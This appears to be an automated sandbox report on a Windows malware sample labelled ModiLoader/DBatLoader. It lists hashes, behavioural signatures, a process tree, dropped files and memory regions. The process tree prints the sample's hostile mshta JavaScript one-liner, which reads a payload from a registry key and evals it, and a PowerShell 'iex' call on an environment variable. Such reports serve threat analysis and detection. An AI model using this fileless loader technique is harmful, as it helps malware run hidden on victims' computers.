Analysis
-
max time kernel
145s -
max time network
53s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
14-06-2024 01:40
General
-
Target
a79397e420c2d3deaf552393faffbafc_JaffaCakes118.exe
-
Size
625KB
-
MD5
a79397e420c2d3deaf552393faffbafc
-
SHA1
100eaad579f586d1ac9f0a24e3716ab91b75b65a
-
SHA256
8ffceb24b4cb855fb4d191a1428b27a93a2e4eae9e3ad33358915785ded0cfb8
-
SHA512
ccff3e1eadea79706e1fc330d3bdc6741be229c59214cef4bfb6da5627ec6ea687f38bd61487ab3492b019356e4d00cd86c635c4d2a6cd94dbae3398e4b48557
-
SSDEEP
12288:3l8DCU119Mw1dUV+S1/Fy5mDParHo6zBfV4/XdzkbAufaUDi:18+VmiV7oHlzBfV4/XdzQ7i
Score
10/10
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
ModiLoader Second Stage 10 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 16 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a79397e420c2d3deaf552393faffbafc_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a79397e420c2d3deaf552393faffbafc_JaffaCakes118.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 5762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 10682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 2522⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 11162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 11802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12242⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 14002⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 12682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 14282⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 14202⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 14642⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3448 -ip 34481⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:UPq5KIde="Kp70yB";O4o8=new%20ActiveXObject("WScript.Shell");TkyqKe5="Jv0ggilfz";yGmO6=O4o8.RegRead("HKLM\\software\\Wow6432Node\\ULa7SDvXE\\U5DASfU9G");Nf7BSe7w="RR";eval(yGmO6);eN0b3GGMhC="BIKWgF8";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:eyma2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3448 -ip 34481⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mh2w1hcr.bcp.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3448-10-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-9-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-3-0x0000000000400000-0x00000000004A1000-memory.dmpFilesize
644KB
-
memory/3448-5-0x0000000003670000-0x00000000036B0000-memory.dmpFilesize
256KB
-
memory/3448-6-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-7-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-2-0x00000000031B0000-0x00000000032B1000-memory.dmpFilesize
1.0MB
-
memory/3448-1-0x0000000003670000-0x0000000003671000-memory.dmpFilesize
4KB
-
memory/3448-11-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-8-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-12-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-0-0x00000000031B0000-0x00000000032B1000-memory.dmpFilesize
1.0MB
-
memory/3448-37-0x0000000000080000-0x0000000000140000-memory.dmpFilesize
768KB
-
memory/3448-36-0x0000000003670000-0x00000000036B0000-memory.dmpFilesize
256KB
-
memory/3448-33-0x0000000000400000-0x00000000004A1000-memory.dmpFilesize
644KB
-
memory/4636-14-0x0000000005310000-0x0000000005346000-memory.dmpFilesize
216KB
-
memory/4636-18-0x00000000061B0000-0x0000000006216000-memory.dmpFilesize
408KB
-
memory/4636-28-0x0000000006220000-0x0000000006574000-memory.dmpFilesize
3.3MB
-
memory/4636-29-0x00000000066E0000-0x00000000066FE000-memory.dmpFilesize
120KB
-
memory/4636-30-0x0000000006720000-0x000000000676C000-memory.dmpFilesize
304KB
-
memory/4636-31-0x0000000007F50000-0x00000000085CA000-memory.dmpFilesize
6.5MB
-
memory/4636-32-0x0000000006C10000-0x0000000006C2A000-memory.dmpFilesize
104KB
-
memory/4636-17-0x0000000006140000-0x00000000061A6000-memory.dmpFilesize
408KB
-
memory/4636-16-0x0000000005940000-0x0000000005962000-memory.dmpFilesize
136KB
-
memory/4636-15-0x0000000005A60000-0x0000000006088000-memory.dmpFilesize
6.2MB